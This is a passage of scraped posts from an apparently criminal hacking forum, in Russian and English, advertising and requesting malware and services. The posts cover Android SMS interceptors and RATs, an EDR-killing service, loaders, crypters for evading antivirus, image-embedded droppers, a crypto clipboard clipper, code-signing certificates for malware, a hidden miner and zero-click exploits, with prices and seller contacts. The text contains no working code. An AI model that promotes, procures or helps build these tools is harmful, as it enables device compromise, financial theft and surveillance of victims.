**Продам ANDROID смс перехватчик с отправкой лога в телеграмм бота.
Оплата лишь через гаранта форума!
Перехватчик отправляет список старых сообщений и прослушивает новые в фоновом
режиме.
Не требует крипта, не обнаруживается гугл защитой.
Разработаю индивидуальное приложение по вашему запросу.
Видео FAKE FACEBOOK MARKETPLACE прилагаю по ссылке:
[Ссылка на онлайн видеоплеер](https://gemoo.com/tools/upload-
video/share/686827111001022464?codeId=DGlLN82On1kQO&card=686827107070967808&origin=videolinkgenerator)
t.me
**
Spoiler: Прайс
1 крипт - 40$
Доп.услуги
Иконка - бесплатно
Памп - бесплатно
Авторан - 3$
Контакты:
Telegram
Здравствуйте, уважаемые форумчане!
Предлагаю услуги по отключению защитных решений. Проверено на следующих ЕДР:
Софос, Сентинел, Симантек, Bitdefender, TrendMicro, Eset, в дальнейшем будем
расширять список.
Продаю месячную подписку, то есть в течении месяца чистки бесплатно. На чистку
в случае деткта берем максимально трое суток, стараемся сделать как можно
быстрее. Стоимость 2000$ по каждому ЕДР.
В основе технология BYOVD, работаем на уровне ядра, процессы ЕДР не завершаем,
стараемся работать как можно незаметнее.
Первый контакт лс.
Гарант приветствуется.
Allows you to install any kind of Bot-Rat with one click.
Bypasses Android 13-14 Restrictions.
Disable Play Protect.
Disable Cast Icon.
Bypass Play Store Uploads.
Update Payload Remotly.
I only deal with escrow through xss admins.
Telegram @hiddenmavon
Разработка Launcher | Loader.
Spoiler: Пример TG лога
Стоимость начинается от 400 $. Стоимость зависит от требуемого функционала.
Оплата: любая крипта.
Работа через Гараната XSS.
Контакты для связи: Через ПМ.
Сдаю в аренду инсталлер.
Скрытно устанавливает ваше расширение в браузер жертвы.
Без UAC
Покупка 1к$(без чисток)
Аренда 2к$
Чистки 0$
---------------------------------------------------------------------
Rent installer.
Silent install your expansion in the victim’s browser.
Buying 1k$ (without everyday fud)
Rent 2k$ - Cleaning 0 $
Without UAC
https://scanner.to/result/z2awca5S7egU
Internet: on
contact:
DAB30747E4650B1D71A30E199FE07AED62239661B7EFA109AFA8E0821690D12B2FF84CE2A114
mr.bang@exploit.im
**Metamorphosis Panel - This multifunctional panel has been designed with the
intention of spreading Legitimate and Malware (Remote Access Trojan, HVNC,
Stealer...)
with the option of supporting an unlimited number of clients (Infected).
Advantages:**
Two versions of Stub are available in different languages, including C++ and
Go.
The C++ version weighs between 500 KB , while the Go version weighs between
4.9 MB
ScheduledTask Install (To add to the task scheduler, you need Privileges:
Administrator / You can select a task name )
Mass Execute (Uploading and executing a file for all or selected clients)
Inject DLL (DLL injection allows you to execute your code in the address space
of an already running process, the implementation is only available in the
client process.)
Download and execute (The ability to download and execute your legitimate or
malicious file in hidden mode)
C2 (Command and Control): Enables centralised client management, including the
ability to send commands, manage tasks and retrieve data to the interface,
providing effective control over the connected client.
Sending Shell Command (Sending and executing commands in PowerShell)
Self Delete (Remove the client application from the system, minimizing traces
of its presence.)
Delete Client (deleting a client from the database)
Data collection (Client ID/IP Address/Installation
Date/OS/Architecture/Privileges..)
Customer Statistics (Monitor the status of clients, tracking their
online/offline status and overall number of customers.)
No dependencies the file is completely native (You can run it on completely
empty os)
Mutex (Prevents the programme from being reopened / Data race prevention)
Regedit Startup (Adding to the startup when opening a client)
Supports architectures such as x86 and x64
Support for any cryptor (which native supports)
No server installation required,each server runs on a unique vps.
Complete absence of CPU load (Process does not absence the cpu in any way, it
just weighs in the background.)
Full support throughout the entire period!
Video:
Screenshots:
Detect:
C++ - http://avcheck.net/id/ndwqL4jCrVrA
GO - http://avcheck.net/id/rHfUOeo02mDR
Contact:
TG - t.me/CygnusX0
Price:
200$ - 1month
490$ - 3months
1500$ - LifeTime (Installation on your vps)
Frequently Asked Questions:
Q: What is the difference between the C++ and Go versions of the Stub?
A: The C++ version of the Stub is smaller in size, weighing approximately 500
KB, making it lightweight and suitable for environments where size is a
critical factor. The Go version, on the other hand, is larger at around 4.9 MB
but offers more robust features and performance.
Q: Can I execute files on multiple clients simultaneously?
A: Yes, the Mass Execute feature allows you to upload and execute a file
across all or selected clients.
Q: Is there any impact on CPU performance?
A: No, the process operates silently in the background without any noticeable
impact on CPU performance. This ensures that the client's system remains
unaffected in terms of processing power.
Q: What level of support is provided with the purchase?
A: Full support is provided throughout the entire period of your subscription.
Whether you choose a monthly, quarterly, or lifetime plan, you will have
access to comprehensive support services to assist with any issues or queries.
Spoiler: TODO:
Hybrid connection
Reverse-Proxy
Stealer
HRDP
HVNC
Registration as a service
Clipper
UAC Bypass
WD Disable
WD EXCLUDE
...
Wework only through a guarantor!
/del
Stealth dropper для создания эксплойтов, скрытых в изображениях форматов JPG и PNG, которые запускают вшитую малварь при открытии. Софт позволяет легко внедрить payload в изображение и автоматически выполнять при открытие.
Ключевые возможности:
- Инъекция малвари в JPG и PNG файлы.
- Автоматическая сборка
- Скрытая загрузка и выполнение вредоносного ПО, без видимых признаков
активности.
- Минимальный шанс обнаружения благодаря использованию изображения как
вектора атаки.
На выходе получаете эксплойт-файл готовый к атаке.
Цена софта 1,5k $
Контакт PM, гарант +
Hello.
Какой актуальный контакт для связи с селлером?
Хочу купить его софт
[ENG]
Add a digital signature to malware and certified your malware to bypass SmartScreen.
Digital Signature
Certificate Signing
Off-line CRL Signing
CRL Signing (86)
Certified your malware with organization level integrity bypass Windows Defender Smart Screen at easiest.
What we provide?
1. Private key certificate, and code signature to crypted exe.
2. Time-server stamp
3. SmartScreen bypass
4. USB token device (optional) - we save certificates on directory and able
to certified crypted exe.
5. with/without private key crt and pk12 certificates valid for 1-2 years,
renewal - 68 weeks.
and also,
at smart cost.
Price: $1500
BTC, LTC, XMR, ETH & Tokens
escrow aggree (this forum)
Deposit After First Sale. (sincere request)
bypass smart-screen(Proof):
contact https://t.me/victorinthedark, Forum DM
[RU]
Добавьте цифровую подпись к вредоносному ПО и сертифицировайте свое вредоносное ПО для обхода Умный экран.
Сертифицированное вредоносное ПО с помощью проверки целостности на уровне организации позволяет проще всего обойти SmartScreen защитника Windows.
Что мы предоставляем?
1. Сертификат закрытого ключа и подпись кода для зашифрованного исполняемого
файла.
2. Отметка сервера времени
3. Обход SmartScreen
4. USB-токен устройства (необязательно) - мы сохраняем сертификаты в каталоге
и можем использовать сертифицированный зашифрованный exe-файл.
5. с/без сертификатов закрытого ключа crt и pk12, действительных в течение
1-2 лет, продление - 68 недель.
а также
по разумной цене.
Цена: 1500 долларов
Сумма условного депонирования BTC, LTC, XMR, ETH и токенов
условное депонирование согласовано (этот форум)
Внесите депозит после первой продажи. (искренняя просьба)
обход smartscreen(доказательство):
свяжитесь с нами https://t.me/victorinthedark, Администратор форума
luxhost.cc/check_domain
@LuxHost_Bot
БЕСПЛАТНАЯ ПРОВЕРКА ВАШИХ ДОМЕНОВ НА БЛЕКЛИСТ.
— Реализована проверка доменов на блэклист на сайте и в боте. За один запрос
можно проверить до 10 доменов.
-**Автоматический массовый мониторинг всех ваших доменов
24/7,моментальные уведомления о статусе домена в Телеграм бота.**__
- Для проверки используем актуальные на момент проверки блэклисты Google
Transparency, Yandex, urlvoid и dnsblsmtp для проверки на почтовые блеклисты
- Уникальная постоянная ссылка на проверку. Делитесь со своими партнерами,
заказчиками и подрядчиками уникальной ссылкой с результатами вашей проверки.
По ней же можно сделать речек и увидеть актуальный статус. Наша система
проверки не использует публичные или общедоступные API, данные всегда
максимально актуальные и не провоцируют лишнего внимания на домен.
_**Цена: 0$
![luxhost.cc](/proxy.php?image=https%3A%2F%2Fluxhost.cc%2Fpublic%2Fimages%2Fmain%2Fauth- image.png&hash=056c3a73646cf2ac578c101cbb50e28f&return_error=1)
](https://luxhost.cc/check_domain)
luxhost.cc
**_
Spoiler: Закрыто на депозит. Closed for Desposit. | 1000$.
Astolfo Loader (Jinx V3)
NOW IN C++
RUSSIAN STATES BLOCKED IN VIRUS
РОССИЙСКИЕ ГОСУДАРСТВА ЗАБЛОКИРОВАНЫ ВИРУСОМ
VIDEO: https://streamable.com/gv548j
Me and another person bought the source of Jinx Loader V2 from Ren and im
rebranding to bring you guys an improved and more stable experience keeping
the Web panel in GO but moving the stub over to C++ decreasing size from 5.5mb
Price
Price will be quite diffrent
Similarly to XLoader the Panel will be hosted on my server's and you will
simply pay for
1. Entry Fee only for first purchase about 150$
2. Monthly hosting cost 100$ a month
3. Per stub there will be a price each stub will come crypted unless stated
differently about 50$ each
To purchase Please PM me here or on telegram
t.me/AstolfoLoader
Vouches
There are currently no vouches.
BUT TO TRUSTED MEMBERS THEY CAN GET A FREE TEST AND
i accept cooligan :p
ANY QUESTIONS FEEL FREE TO DM ME <3
RUSSIAN
Загрузчик Astolfo (Jinx V3)
ТЕПЕРЬ В C++
ВИДЕО: https://streamable.com/gv548j
Я и еще один человек купили исходный код Jinx Loader V2 у Рена, и я провожу
ребрендинг, чтобы предоставить вам, ребята, улучшенный и более стабильный
опыт, сохраняя веб-панель в GO, но перенося заглушку на C++, уменьшая размер с
5,5 МБ - 120 КБ X64 и 110 КБ X86.
цена
Цена будет совсем другой
Как и в XLoader, панель будет размещена на моем сервере, и вы просто заплатите за
1. Вступительный взнос только при первой покупке около 150$
2. Ежемесячная стоимость хостинга 100$ в месяц
3. За корешок будет указана цена, каждый корешок будет проставлен в
зашифрованном виде, если не указано иное, около 50$ за штуку
Ручается
В настоящее время поручительств нет.
Принимается условное депонирование
ЕСЛИ У ВАС ЕСТЬ ВОПРОСЫ, НЕ СТЕСНЯЙТЕСЬ ПИСАТЬ МНЕ В ЛИЧКУ
В наличии имеются Code Signing сертификаты (standard/OV/non-EV).
Все сертификаты новые, сроком на 1 год, продаются в одни руки и каждый
сертификат выпускается на отдельном аккаунте.
Срок изготовление одного сертификата - 1-2 дня (почти всегда имеются
сертификаты в наличии, поэтому можно получить сразу после оплаты)
Цена на 1 сертификат: 350 $.
Для постоянных клиентов и при заказе от 2 сертификатов - приятные скидки.
Так же могут быть индивидуальные скидки, всегда иду навстречу покупателям.
Оплата: крипта (Bitcoin, Bitcoin Cash, Ethereum и т.д)
При желании можем работать через гаранта!
куплю инжекты под ба , paypal .операторов связи .Аз по сша и канаде
Возьму кодера в команду на инжекты
возможна работа за %
C++ Clipper / Клиппер - changing crypto wallets in clipboard - All Windows
OS / even Server 2008,2012,and etc
C++ Clipper / Клиппер - подмена кошельков - All Windows OS / even Server
2008,2012,and etc
Вообщем, так вышло, давно пользуюсь своим клиппер сам в личных целях.
Не ставил на продажу, чтоб спокойно дописывать функции - нужные для большего профита - большей эффективности.
У меня получилось сделать уникальный клиппер, который четко безошибочно подменяет кошельки, и запускается на 99% Windows OS, даже серверных.Click to expand...
Что это такое?**
- Подмена кошельков в буфере обмена. То есть, программа определяет адрес при
копировании, меняет в памяти а вставит уже ваш адрес.
- Автономный ? - не имеет действий\отстуков в интернет, работает без
интернета - без ошибочная 99% подмена на любой ОС.
===
Описание минимальное:
-- IPLogger не добавляю, так как проверил на себе, детект лезет изза
обращения в интернет.. не желательно. (сильно нуждающимся сделаю)
- Чистый С++ код.
- Не имеет зависимостей от NET. Framework
- Легко поддается крипту. (за доп оплату дам крякнутую Темиду с конфигом -
3\40 крипт)
- Вес билд 21кб (с криптом внутри кода ~900kb)
- Автозагрука через планировщик задач (если не вносит в планировщик, то
ставиться через реестр)
- Проверка runtime = запущен софт или нет (чекает диспетчер, если не запущена
Цена - 75$ - 3 недели
Цена - 150$ - 2 месяца
Цена - 250$ - навсегда (АКЦИЯ ДЛЯ XSS! НОВАЯ ЦЕНА = 150$)
*если хотите клиппер+стиллер = 300$ - навсегда (возможен торг)
Что получите?**
- 2 билда: 21кб чистый для крипта в дальнейшем, и ~900кб с у ник криптов внутри кода.
- также накладываю фейк сертификат (обход в Chrome)Click to expand...
Детект билда 21кб (без крипта детект около 6-7\40):
//НО! Я выдаю протектор Темида с конфигом - сможете сами криптовать до 3\40
https://kleenscan.com/scan_result/acffe978a1388698bed80a194a656e8b55547f3967cd581426132b8496ad6559
Click to expand...
RUNTIME:
https://dyncheck.com/scan/id/bdc6ad00475f596c0b229c8d8f261f4e
Click to expand...
**_ p.s. около 7-9 покупателей взорвали куш в течении месяца +5к$ и больше.
*после покупки помогаю окупить клиппер, заработать 200+_
Мой профит вышел таков, период времени месяц. Как раз когда обрушились биржы
и тому подобное:
Spoiler: скрин
Spoiler: доп
Как работает клиппер, гифка:
В буфере обмене ждет копирование любого из кошелька и подменяет при вставке.
..позже будет гифка=====================
СКЛЕЙКА С++ - 20$ (бесконечно файлов)
также могу склеить клиппер с любой программой вплоть до 1гб
- чистый С++биндер
- детектов не добавляет
- добавляю иконку инфо и серт.Click to expand...
Готов пройти проверку
Click to expand...
Telegram: Ukamana
Знают меня как криптора) Криптую файлы .NET \ Native
Click to expand...
Crypting your files
- Encrypt .apk files
- Support Spynote : Spynox : CrasxRat etc. botnets
- Support 64x and 86x files
- Free icons.
---------------------------------------------------------------
Accept payment
- Crypto: Bitcoin, Tether (TRC20)
- Forums / qiwi
---------------------------------------------------------------
Prices
- 1 Crypto: 15$
nolimit crypto machine - 300$
Additional information
1. I do fully FUD, bypass google protection is guaranteed
2. bounce 80-90%
3. Detects zero
Completely help and bring to profit.
---------------------------------------------------------------
The rest of the list
- I agree on the guarantor
- We can also accept payment in other services/crypt (just tell us).
- Information about detectors is constantly updated
---------------------------------------------------------------
pm me in forum
CRYPT
[RU ]
Крипт имеет возможности:
Крипт способен зашифровать и скрыть от АВ любой ваш инструмент начиная от
stealer и заканчивая ransomware.
Продукт успешно был протестирован на популярных антивирусных решениях таких
как: Windows Defender (win 10, win 11), Kaspersky, ESET NOD32, Avast, McAfee,
AVG
Дополнительно:
Сервис ориентирован на долгую и плодотворную работу с клиентом. Есть возможность учесть ваши пожелания или идеи для того что бы у вас все работало как вы задумали.
Я могу предоставить вам на тест один крипт бесплатно что бы вы могли проверить подходит ли он вам в ваших задачах.
Перед оплатой за услугу я проверяю у себя работоспособность и даю возможность проверить ее вам.
Telegram - @academicRuslan
[ENG ]
Crypt has the capabilities:
Crypt is capable of encrypting and hiding from AV any of your tools from
stealer to ransomware.
The product has been successfully tested on popular antivirus solutions such
as: Windows Defender (win 10, win 11), Kaspersky, ESET NOD32, Avast, McAfee,
AVG
Extras:
The service is oriented on long and fruitful work with the client. There is an opportunity to take into account your wishes or ideas to make everything work as you intended.
I can give you one crypt to test for free so you can see if it suits your needs.
Before paying for the service, I check with myself to make sure it works and let you check it.
Telegram - @academicRuslan
EN
Hello all,
I'm offering an .HTM|.HTML|.XHTM|.XHTML virus file dropper builder and crypting service
This dropper is used to safely transport downloadable files with any file extension. It is 100% FUD and bypasses antivirus
Check out the demo above to see it function in full
Pricing
1 build = $5
25 build = $50
100 build = $100
I accept escrow service here on XSS.is
Contact me here or on TG: DmitriBlov
RU
Привет всем,
Я предлагаю услуги по созданию и криптованию вирусных файлов-дропперов .HTM|.HTML|.XHTM|.XHTML
Этот дроппер используется для безопасной транспортировки загружаемых файлов с любым расширением. Это 100% FUD и обходит антивирусы.
Посмотрите демо выше, чтобы увидеть его функции в полном объеме
Ценообразование
1 сборка = $5
25 сборок = $50
100 сборок = $100
Я принимаю услуги эскроу здесь, на XSS.is
Свяжитесь со мной здесь или на TG: DmitriBlov
Пока возился с буткитами и отлаживал их на VMWare нашлась хорошая дыра в
безопасности.
Выглядит так: скачивается образ VM, после его открытия и запуска в VMWare из
гостевой ОС на хостовую ОС будет закинут исполняемый файл.
Сейчас пока что это тестовый hta файл, скорее всего можно и сразу EXE. Либо из
hta файла можно будет скачать и запустить EXE, либо дропнуть и запустить EXE.
Посмотрел по базам уязвимостей - ничего такого там точно нет, это 100% новое.
Эксплоит пока сейчас только в виде PoC - запустится тестовый hta файл, который
выведет месседжбокс. Без проблем доработаю до запуска EXE.
Кому интересно - связь через PM.
для винды от систем и юзера
нужен файл трансфер, выполение команд и тд чистый от всех ав можно
буткит\руткит бюджет до 300к
Команда которая не первый год работает по андроиду ищет хороший продукт в
аренду или под %
В нашей команде есть свой трафер и отработчики логов.
Делаем хороший профит
Важно чтоб бот работал стабильно на 13-14 андроиде, рабочий VNC и HVNC, грабер
код пароля и паттерна
Прошу не предлагать форки по типу хук бота (с недопилинным vnc ), так же не
интересует форки craxs rat и ему подобные
контакт в ПМ
Появилась срочная потребность в Android RAT. К сожалению, наш разработчик, который изначально брался за разработку, не смог сделать часть необходимых для работы функций. Поэтому рассмотрю варианты покупки/аренды/написания под заказ Android RAT со следующим функционалом (описаны только важные моменты, без которых продукт не интересен): работа на последних версиях Android, работающий VNC с возможностью установки черного экрана, кейлоггер (оффлайн и онлайн). Также необходимы некоторые другие функции, но они менее важны, например, чтение сообщений или использование камеры/микрофона. В любом случае, если у вас уже есть продукт с необходимым функционалом, я с радостью рассмотрю предложение о покупке/аренде даже, если там не будет других менее важных функций. Цена обсуждается индивидуально в зависимости от того, что у вас имеется или вы способны сделать на заказ. В приоритете готовые продукты, но также рассмотрю написание на заказ в короткие сроки.
Важно: никаких предоплат не будет (несмотря на репутацию), работа исключительно через гаранта с детально прописанными условиями для всех сторон.
Контакты:
PM
Jabber: dark_crystall@exploit.im
Tox:
2FEDD5B03A0486443D54BC393783FC9A4C2A2E73236D27551A3269E01B8013443C8A15EA387E
Любые другие по запросу.
Подписываем Ваш exe сертификатом с любого приложения !
Мы Вам дарим 3 бесплатные подписи файла !
Spoiler: Закрыто на депозит
Авчек с последнего крипта - https://avcheck.net/id/T5q3cymrXTqc
Обход WinDef
**- Крипт любого NATIVE|.NET софта -
- Чистый RunTime -
На гаранта согласен
Принимаем оплату**
BTC
USDT
GARANT XSS
**Мы предлагаем услуги по предоставлению скрытого майнера Unam и 100%
криптозащиты для него. Наш приватный криптор разработан специально для
майнинга Unam. Майнеры работают стабильно годами. Продаем криптор по цене
500$.
При нагрузке 20% и имея 10 000 трафика, наш хешрейт составляет 1.53 MH/сек, а
в пиковые часы вечером он достигает 2+ MH/сек. Доход зависит от выбранной
валюты и сложности майнинга, и составляет примерно 50-70$ в сутки при таких
результатах.
Если у вас есть большой объем трафика, мы можем договориться о сотрудничестве на условиях 50/50. Мы предоставим техническую поддержку, а вы - трафик. Наш криптор будет долго жить, так как он не является публичным.
Особенно нас интересуют пользователи с большим объемом трафика. Пишите в
личные сообщения в Telegram @frimunss
Примеры нашей работы представлены ниже.
Также я открыл группу в Telegram, где мы будем фиксировать прибыль и
показывать весь процесс. Подписывайтесь: @umankr**
Вопрос ко всем, кто занимается распространением любого вида вредоносного ПО
по интернету. (Ув. админы, если создал тему не в той ветке, прошу прощения,
просьба перекинуть в нужную.)
1,5 месяца не дает покоя алерт браузера "insecure download blocked"
Если вдруг вы не сталкивались с такой проблемой, то кратко введу в курс дела.
У Хрома есть 2 типа алертов на скачку файла:
**Из-за чего возникает нижний - прекрасно понятно, файл говно, палиться,
плохой крипт, серт и так далее.
Из-за чего возникает верхний - не понятно. В описании гугла указанно то, что данный файл скачали небольшое кол-во раз и из-за этого он вызывает подозрения. Но при этом всем же понятно, что не должно быть так "чтобы скачать файл без алерта, пускай ваш файл скачают 1000 раз с алертом" - бред !
Мотался по всем "Громким именам" этого рынка, кто в паблике оказывает какие-
либо услуги по трафу, лоадерам, дроперам, криптам и прочему. У Всех разное
мнение.
Брал у каждого на тест дроперы/лоадеры. Перепробовал все форматы, начиная от
даблклик exe, заканчивая msix и exe с обязательной установкой.
Все это тестировалось в связках с разными криптами. Начиная от "Всеми
уважаемого человека который продает свой криптер за 3к в месяц
"
заканчивая помойным криптом в ТГ, который за 100$ тебе и билд криптанет, и на
выдачу в ФО повесит этот же файл, называя это "прямой траст выдачей")).
Позанимавшись этой хренью неделю и потратив на это не один десяток тысяч юсдт
решили пойти к ВЕБ-разработчикам/кодерам которые "умеют в сайты"
А вот тут началось самое интересное. И название не то, и домены, и клоаки
пробиваются, файл тут же сканят боты АВ (Хотя у файла даже скачек
нет)
В общем кто как только не объяснял мне почему он свою часть работы выполнил и
должен получить за это деньги, а алерт на файле из-за того, что он даже не
представляет как это работает и косяк у кодеров которые пишут сам файл(Хотя
как уже описывал выше мой файл - это дорогие лоадеры и дроперы, да, я понимаю
что это паблик. Но за ними же тоже следят, вряд ли ребята за подписки по
6к/мес+ допустят какой-то косяк в лоадере, который они быстро не исправят)
Нашел более-менее адекватного человека, который сказал, что можно купить траст
домены с "аукционов" и из-за того что они индексировались в гугле - будет
некая трастовасть на файл и алерта не будет.
Так вот не тратьте на это
деньги
Купил 4 штуки, везде одно и тоже.
Так вот, ищу человека, кто может помочь мне повесить ЛЮБОЙ ФАЙЛ который будет лоадить мое ВНЦ на usa pc. Или подскажет какие-то пути решения этой проблемы.
Потому что, все что я слышу от кодеров - что косячит крипт, от крипта - что косячит выдача, от выдачи - что говно файл. И так по кругу стабильно раз в 3 дня. Это конечно хорошо, но с конвертном 15% сидеть на жопе ровно не хочется, поэтому готов заплатить за какое-то решение с поддержкой или разовым объяснением как избавиться от этого алерта. Само собой гарант ))
Связь либо ТГ @akame_main
Либо ЛС форума (захожу раз в день)**
Ботнет:
“Сеть из ботов, т.е. определенное количество компьютеров, на которых
установлена малварь”.
Нужен ботнет для работы с сайтами.
Для обычных действий имитирующих пребывание пользователя на сайте.
Прога, выполняющая нужный алгоритм действий на сайтах, есть.
Нужен только ботнет, что бы подключить к этой программе.
Spoiler: Закрыто на депозит
Hello everyone, this project is a edit of ermac. The apk source was written from scratch and Ermac's chronic problems were fixed and a new theme was added. The bot death problem has been fixed, new injects have been added and existing injects have been updated. Faster communication is achieved with bots.
Features/
I think dont need a list of it
Features will come soon
Graphical VNC
Apks will delivered with FUD, you'll dont need pay for fud
Monthly 300$
Lifetime 1500$
Photos From Control Panel
PUSH- УВЕДОМЛЕНИЕ О НОВОМ ПРОДУКТЕ
HeadlessHorseman
HeadlessHorseman предлагает новый метод распространения
, которого раньше не было. Распространение с помощью HeadlessHorseman позволит
вам
использовать незлокачественный URL-адрес для последующей доставки полезной
нагрузки или
фишингового сайта по вашему выбору. Времена, когда цели
удалялись из-за того, что ваш RAT / ботнет не поддерживает операционную
систему, прошли.
HeadlessHorseman
Совместимость с ОС
- Windows
- macOS
- Linux
- Android
- iOS
HeadlessHorseman
Совместимость с браузерами
- Google Chrome
- Mozilla Firefox
- Браузер Opera
- Microsoft Edge
- Safari
HeadlessHorseman
Методы распространения
- Публикация URL-адреса в социальных сетях.
- Публикация URL-адреса на форуме.
- Отправка URL-адреса по электронной почте.
- Отправка SMS с URL-адресом в сообщении.
- Отправка сообщения Whatsapp / Telegram / XMPP с URL-адресом.
- Онлайн-QR-коды.
- Физические QR-стикеры.
HeadlessHorseman
Доп.
- Посетите любой веб-сайт.
- Загрузите любой файл. (прямая ссылка)
- Добавьте на свой текущий веб-сайт.
**::PRICES::
€3,000 - Продажа исходных кодов
€3,500 - Продажа исходных кодов , помощь в выборе хостинга - домена , установке админ панели под ключ.**
по всем вопросам обращаться в отдельно созданный телеграмм @Adm_Headless_Horseman
Crypter with bypass smartscreen by dll hitjacking.
Продаю криптер с обходом смартскрина по принципу dll hitjacking.
Functions: auto cleaning, auto build every xxm.
В функциях автоочистка каждые 30 минут и 3 пейлоада.
Поддерживает .net и native, компилятор mingw.
No need knownledge of programming language all auto.
Для безруких подойдёт, яп знать не надо, все доведено до автоматизма, достаточно закинуть exe в папку. Есть функция кражи подписи.
Помогаю с установкой тем кто не может. Help with installing.
50$ PER FILE
Fully Undetected!
Undetectable REG Dropper with Windows Defender exclusion and 100% silent
payload execution. GMAIL, SMARTSCREEN, CHROME and WD Bypass
contact telegram:madara0x
iMessage RCE Exploit
Exploit Type: ZeroClick (Without User Interaction)
#Payload - SMS
#Control over Device
#support **iOS 17.xx and iOS 18.xx
Contact us for iOS 18 beta PoC
**
We provide BUILDER LNK 2024, a highly powerful tool for disguising your payload.
We don’t make grand claims like other sellers who only list many non-existent features.
Here are the real features of our BUILDER LNK 2024. It is exceptionally unique and simple to operate. We focus entirely on the following to ensure the best performance. We guarantee your satisfaction.
1. Bypasses most common antivirus software
2. Bypass Smartscreen
3. Bypass Chrome
4. Multiple common icons
5. Decoy (upon opening your .lnk, a file of your choosing will be displayed
on your victim's PC)
6. Display an error message when the .lnk file is opened
7. Supported payload formats: .exe/.js/.vbs/.bat/.ps1/.bin
8. Each LNK file is unique.
9. Unlimited builds
Price: $400/month
ESCROWS ARE ACCEPTED
We provide daily, hourly, monthly support. We are dedicated to resolving issues. We ensure that we stand by you. This is something no one else in this forum does well.
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
Приветствую. Куплю рабочий приват эксплоит для уязвимости CVE-2024-38077. С предложениями в ПМ. Строго через гаранта!
Прокрутите, чтобы увидеть русский перевод
Details:
Lockness is a 100% guaranteed FUD Crypt service. We are proud to say we have
the best evasion strategies out on the market. Our team does mostly custom
requests which range from $150-1000 USD
Business is solely done on telegram and onsite (we are working on a web panel)
ONLY ACCEPT MIDDLEMEN FROM t.me/middleman
Our service runs off uses a polymorphic engine so you dont have to worry about having the same signatures as other customers
We are confident in our evasion techniques such that if they dont work, we offer a 100% refund.
Info:
100% Virtual Machine evasion (Or money back)
Anti-Debug
Windows 10+ and Linux stubs
Custom built polymorphic engine
Multiple injection techniques (See below)
Stubs/Injection techniques:
Normal auto run in subprocess
DLL Injection
DLL Hijack/DLL proxying
Process hollowing (Recommended)
PE injection (Recommended)
Any technique that is not listed can be provided via a custom build.
Pricing:
Beginner $150 USD: Access to DLL injection and autorun stubs. limited anti-vm
and anti-debug modules
Intermediate $400: Access to all injection techniques, anti-vm, and anti-debug modules. Live support.
Advanced $1000+: Custom builds, Full access to everything, live development team, access to private telegram groupchat
How to order:
To order contact @bigbosshacker on telegram (t.me/bigbosshacker) Or PM on site
for other ways of communication
All orders are processed on telegram or on site. We only use middlemen.
это было переведено с помощью Google Translate. Приносим извинения за любые
грамматические ошибки
Подробности:
Lockness — это услуга FUD Crypt со 100% гарантией. Мы с гордостью можем сказать, что у нас есть лучшие стратегии уклонения на рынке. Наша команда выполняет в основном индивидуальные запросы на сумму от 150 до 1000 долларов США.
Бизнес ведется исключительно в телеграмме и на сайте (работаем над веб- панелью)
ПРИНИМАЕМ ТОЛЬКО ПОСРЕДНИКОВ ОТ t.me/middleman
В нашем сервисе используется полиморфный движок, поэтому вам не придется беспокоиться о том, что у вас такие же подписи, как у других клиентов.
Мы уверены в своих методах уклонения от уплаты налогов и поэтому, если они не сработают, мы предлагаем 100% возврат средств.
Информация:
100% обход виртуальной машины (или возврат денег)
Антиотладка
Заглушки для Windows 10+ и Linux
Специально созданный полиморфный движок
Методы множественных инъекций (см. ниже)
Заглушки/Техники инъекции:
Обычный автоматический запуск в подпроцессе
DLL-инъекция
Перехват DLL/проксирование DLL
Процесс выдалбливания (рекомендуется)
Инъекция полиэтилена (рекомендуется)
Любая техника, не указанная в списке, может быть реализована посредством специальной сборки.
Цены:
Новичок: 150 долларов США: доступ к внедрению DLL и заглушкам автозапуска.
ограниченные модули защиты от виртуальной машины и отладки
Средний уровень — 400 долларов США: доступ ко всем методам внедрения, модулям
защиты от виртуальной машины и отладки. Живая поддержка.
Продвинутый уровень: $1000+: пользовательские сборки, полный доступ ко всему,
живая команда разработчиков, доступ к частному групповому чату в Telegram.
Как заказать:
Для заказа обращайтесь к @bigbosshacker в телеграм (t.me/bigbosshacker) Или в личку на сайте по другим способам связи
Все заказы обрабатываются в телеграмме или на сайте. Мы пользуемся услугами только посредников.
Spoiler: Not actual / неактуально
**_- We have been bypassing windows defender for a long time with our unique
sandbox and emulator bypassing systems.
- Stub is generated every crypt
- Each of our crypt has the strongest uniqueness.
- We use manual process memory loading with a unique antidump system,
allowing your stub to live much longer.
- We guarantee you FUD scantime
- We guarantee you bypassing the WD
PRICE: 60$ per crypt
Contact tg: @runpeprocess_**
Spoiler: Неактуальная ссылка на канал
channel: t.me/crypt256
Интересует крипт apk на постоянной основе. Рассмотрю любые формы сотрудничества: разовые билды, подписка, работа за процент или любой другой удобный для вас вариант. Важно: интересует человек именно на постоянную основу.
Убедительная просьба: если вы планируете впарить паблик, попытаться развести на предоплату и т.п - пройдите мимо, это лишь отнимет наше общее время. На первых порах работа исключительно через автоматический гарант.
Также буду рад тем людям, которые могут свести с человеком/сервисом по данному запросу, отблагодарю финансово в случае успешного сотрудничества (к большинству сервисов я уже обращался самостоятельно, уточняйте этот момент при диалоге).
Контакты:
PM
Jabber: dark_crystall@exploit.im
Tox:
2FEDD5B03A0486443D54BC393783FC9A4C2A2E73236D27551A3269E01B8013443C8A15EA387E
Любые другие по запросу.
Предлагаю доставку вашего пейлоада c обходом Smartscreen и Chrome Alert.
DLL side-loading реализация.
Есть возможность открытия и подкачки любых окон в системе жертвы.
Контакты: PM \ lok11@exploit.im
Selling Golang RDP Bruteforcer (RUNS ON WINDOWS AND LINUX)
Details:
Multi-Threaded Support. (Golang uses semaphores)
Cross-Platform Compatibility: Both Windows and Linux (any OS).
Telegram Bot Notifications. (Get notified of successful brutes in real time,
eliminating the need to check manually)
Real-Time detection of RDP (Does not log honeypots).
Never a false positive!
Flexible Input Formats: Support just IP's under one port or even IP:PORT
format for any port you want.
Specify any port: Works on any port specified by user input.
In depth error handling: Handles errors and retries based off auth,
connection, timeouts, and more.
Does not skip IP's or combos.
Built around memory optimization such as stdin and stdout for outputs and
inputs.
Multiple Buffers.
Can support millions of IP's and thousands of combos in one run.
Certificates ignored but still allows connection.
Over 350 lines of code and carefully built.
Price is only 300$
Telegram: https://t.me/cyb3rph4nt0m
May contact DM but will take a while for a response.
Escrow 100% encouraged for sales.
В процессе чтения и изучения софта я так и не понял, какие самые прибыльные
